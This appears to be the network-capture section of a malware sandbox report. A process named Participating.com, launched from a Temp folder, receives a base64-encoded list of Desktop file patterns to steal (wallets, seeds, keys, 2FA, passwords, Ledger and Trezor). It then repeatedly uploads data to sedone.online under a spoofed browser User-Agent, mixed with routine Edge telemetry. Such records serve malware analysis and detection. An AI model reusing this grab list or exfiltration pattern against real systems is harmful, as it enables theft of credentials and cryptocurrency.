                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
2024-12-16 12:47:31 UTC | 2208 | IN | Data Raw: 38 39 34 0d 0a 52 47 56 7a 61 33 52 76 63 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e
                                                                                                                                                                                                                                                                Data Ascii: 894RGVza3RvcHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.8 | 49854 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:33 UTC | 327 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----LNOZ5XL6XLN7YUAS2VAS
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                Host: sedone.online
                                                                                                                                                                                                                                                                Content-Length: 61029
                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                Cache-Control: no-cache
2024-12-16 12:47:33 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 4c 4e 4f 5a 35 58 4c 36 58 4c 4e 37 59 55 41 53 32 56 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 65 37 34 36 35 33 66 65 35 33 36 32 64 63 34 31 37 32 37 32 30 35 38 65 61 66 63 61 64 33 35 0d 0a 2d 2d 2d 2d 2d 2d 4c 4e 4f 5a 35 58 4c 36 58 4c 4e 37 59 55 41 53 32 56 41 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 39 34 61 63 64 64 33 66 34 63 36 64 64 34 61 32 35 38 65 39 37 39 38 31 37 30 63 30 31 35 39 0d 0a 2d 2d 2d 2d 2d 2d 4c 4e 4f 5a 35 58 4c 36 58 4c 4e 37 59 55 41 53 32 56 41 53 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                Data Ascii: ------LNOZ5XL6XLN7YUAS2VASContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------LNOZ5XL6XLN7YUAS2VASContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------LNOZ5XL6XLN7YUAS2VASCont
2024-12-16 12:47:35 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:34 GMT
                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                Connection: close
2024-12-16 12:47:35 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.8 | 49855 | 20.42.73.31 | 443 | 7920 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:34 UTC | 1044 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734353251778&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Content-Length: 11575
                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=162DEC371C56639E2ED8F9601DDC6260; _EDGE_S=F=1&SID=2227530D156E6C9118DD465A14EA6DDE; _EDGE_V=1; _C_ETH=1; msnup=
2024-12-16 12:47:34 UTC | 11575 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-16T12:47:31.777Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":2,"installId":"51f542e9-8580-47db-a93c-34b19ce16355","epoch":"3207482814"},"app":{"locale
2024-12-16 12:47:34 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=157d039350b946a193b3fa7f6f21bbd9&HASH=157d&LV=202412&V=4&LU=1734353254349; Domain=.microsoft.com; Expires=Tue, 16 Dec 2025 12:47:34 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                Set-Cookie: MS0=73681e32f2264ada8f0c8cec8ce868fc; Domain=.microsoft.com; Expires=Mon, 16 Dec 2024 13:17:34 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                time-delta-millis: 2571
                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:34 GMT
                                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.8 | 49856 | 20.42.73.31 | 443 | 7920 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:34 UTC | 1043 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734353251781&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Content-Length: 5082
                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=162DEC371C56639E2ED8F9601DDC6260; _EDGE_S=F=1&SID=2227530D156E6C9118DD465A14EA6DDE; _EDGE_V=1; _C_ETH=1; msnup=
2024-12-16 12:47:34 UTC | 5082 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-16T12:47:31.780Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":3,"installId":"51f542e9-8580-47db-a93c-34b19ce16355","epoch":"3207482814"},"app":{"locale
2024-12-16 12:47:34 UTC | 890 | IN | HTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=aa39e0284ab44f28bf5ece363af4f971&HASH=aa39&LV=202412&V=4&LU=1734353254717; Domain=.microsoft.com; Expires=Tue, 16 Dec 2025 12:47:34 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                Set-Cookie: MS0=33a20e6f45694da3b28293aa12d0dfcf; Domain=.microsoft.com; Expires=Mon, 16 Dec 2024 13:17:34 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                time-delta-millis: 2936
                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:34 GMT
                                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.8 | 49857 | 20.42.73.31 | 443 | 7920 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:34 UTC | 1033 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734353252627&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Content-Length: 5280
                                                                                                                                                                                                                                                                sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                Cookie: USRLOC=; MUID=162DEC371C56639E2ED8F9601DDC6260; _EDGE_S=F=1&SID=2227530D156E6C9118DD465A14EA6DDE; _EDGE_V=1; msnup=
2024-12-16 12:47:34 UTC | 5280 | OUT | Data Ascii: {"name":"MS.News.Web.LoadTime","time":"2024-12-16T12:47:32.625Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":4,"installId":"51f542e9-8580-47db-a93c-34b19ce16355","epoch":"3207482814"},"app":{"locale
                                                                                                                                                                                                                                                                2024-12-16 12:47:35 UTC890INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                Set-Cookie: MC1=GUID=04acf07082aa45e6be1af34f71d06d62&HASH=04ac&LV=202412&V=4&LU=1734353255127; Domain=.microsoft.com; Expires=Tue, 16 Dec 2025 12:47:35 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                Set-Cookie: MS0=f01260c7fbdf4a1495df13ebad87cb37; Domain=.microsoft.com; Expires=Mon, 16 Dec 2024 13:17:35 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                time-delta-millis: 2500
                                                                                                                                                                                                                                                                Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                Date: Mon, 16 Dec 2024 12:47:35 GMT
                                                                                                                                                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.8 | 49858 | 20.42.73.31 | 443 | 7920 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:35 UTC | 1033 | OUT | POST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734353252776&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
Host: browser.events.data.msn.com
Connection: keep-alive
Content-Length: 9683
sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://ntp.msn.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
Referer: https://ntp.msn.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
Cookie: USRLOC=; MUID=162DEC371C56639E2ED8F9601DDC6260; _EDGE_S=F=1&SID=2227530D156E6C9118DD465A14EA6DDE; _EDGE_V=1; msnup=
2024-12-16 12:47:35 UTC | 9683 | OUT | Data Ascii: {"name":"MS.News.Web.ContentView","time":"2024-12-16T12:47:32.775Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":5,"installId":"51f542e9-8580-47db-a93c-34b19ce16355","epoch":"3207482814"},"app":{"loc
2024-12-16 12:47:35 UTC | 890 | IN | HTTP/1.1 204 No Content
Content-Length: 0
Server: Microsoft-HTTPAPI/2.0
Strict-Transport-Security: max-age=31536000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: MC1=GUID=d8be8951bcd64467b7a96f8002f1eca0&HASH=d8be&LV=202412&V=4&LU=1734353255282; Domain=.microsoft.com; Expires=Tue, 16 Dec 2025 12:47:35 GMT; Path=/;Secure; SameSite=None
Set-Cookie: MS0=369b5fdf71264f54a4b4668a0976f4dd; Domain=.microsoft.com; Expires=Mon, 16 Dec 2024 13:17:35 GMT; Path=/;Secure; SameSite=None
time-delta-millis: 2506
Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
Access-Control-Allow-Methods: POST
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: https://ntp.msn.com
Access-Control-Expose-Headers: time-delta-millis
Date: Mon, 16 Dec 2024 12:47:34 GMT
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.8 | 49859 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:35 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DJ5FK6FU3EKNYMOPHD2D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 7005
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 12:47:35 UTC | 7005 | OUT | Data Ascii: ------DJ5FK6FU3EKNYMOPHD2DContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------DJ5FK6FU3EKNYMOPHD2DContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------DJ5FK6FU3EKNYMOPHD2DCont
2024-12-16 12:47:36 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 12:47:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-16 12:47:36 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.8 | 49860 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:36 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----M790ZMO8YUSRIMGDJMGV
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 60993
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 12:47:36 UTC | 16355 | OUT | Data Ascii: ------M790ZMO8YUSRIMGDJMGVContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------M790ZMO8YUSRIMGDJMGVContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------M790ZMO8YUSRIMGDJMGVCont
2024-12-16 12:47:38 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 12:47:37 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-16 12:47:38 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.8 | 49861 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:39 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----RIMOH4WLXBIMYMG4OHVS
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 61005
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 12:47:39 UTC | 16355 | OUT | Data Ascii: ------RIMOH4WLXBIMYMG4OHVSContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------RIMOH4WLXBIMYMG4OHVSContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------RIMOH4WLXBIMYMG4OHVSCont
2024-12-16 12:47:40 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 12:47:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-16 12:47:40 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.8 | 49863 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:40 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----16PP890HDJM7QQ1V3OH4
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 6985
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 12:47:40 UTC | 6985 | OUT | Data Ascii: ------16PP890HDJM7QQ1V3OH4Content-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------16PP890HDJM7QQ1V3OH4Content-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------16PP890HDJM7QQ1V3OH4Cont
2024-12-16 12:47:41 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 12:47:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-16 12:47:41 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.8 | 49865 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com

Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:42 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----1DTJW47QQ9RQQIMOZU3E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 60969
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 12:47:42 UTC | 16355 | OUT | Data Ascii: ------1DTJW47QQ9RQQIMOZU3EContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------1DTJW47QQ9RQQIMOZU3EContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------1DTJW47QQ9RQQIMOZU3ECont
2024-12-16 12:47:43 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 12:47:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-16 12:47:43 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.8 | 49869 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:51 UTC | 327 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----V3WLNGD26F3EU3W4O8GV
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 32481
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 12:47:51 UTC | 16355 | OUT | Data Ascii: ------V3WLNGD26F3EU3W4O8GVContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------V3WLNGD26F3EU3W4O8GVContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------V3WLNGD26F3EU3W4O8GVCont
2024-12-16 12:47:52 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 12:47:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-16 12:47:52 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.8 | 49870 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com
Timestamp | Bytes transferred | Direction | Data
2024-12-16 12:47:52 UTC | 326 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----7YCBIE37YCBAIEC26FCB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: sedone.online
Content-Length: 4421
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-16 12:47:52 UTC | 4421 | OUT | Data Ascii: ------7YCBIE37YCBAIEC26FCBContent-Disposition: form-data; name="token"fe74653fe5362dc417272058eafcad35------7YCBIE37YCBAIEC26FCBContent-Disposition: form-data; name="build_id"294acdd3f4c6dd4a258e9798170c0159------7YCBIE37YCBAIEC26FCBCont
2024-12-16 12:47:53 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 16 Dec 2024 12:47:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-16 12:47:53 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.8 | 49871 | 116.203.12.114 | 443 | 8084 | C:\Users\user\AppData\Local\Temp\615578\Participating.com
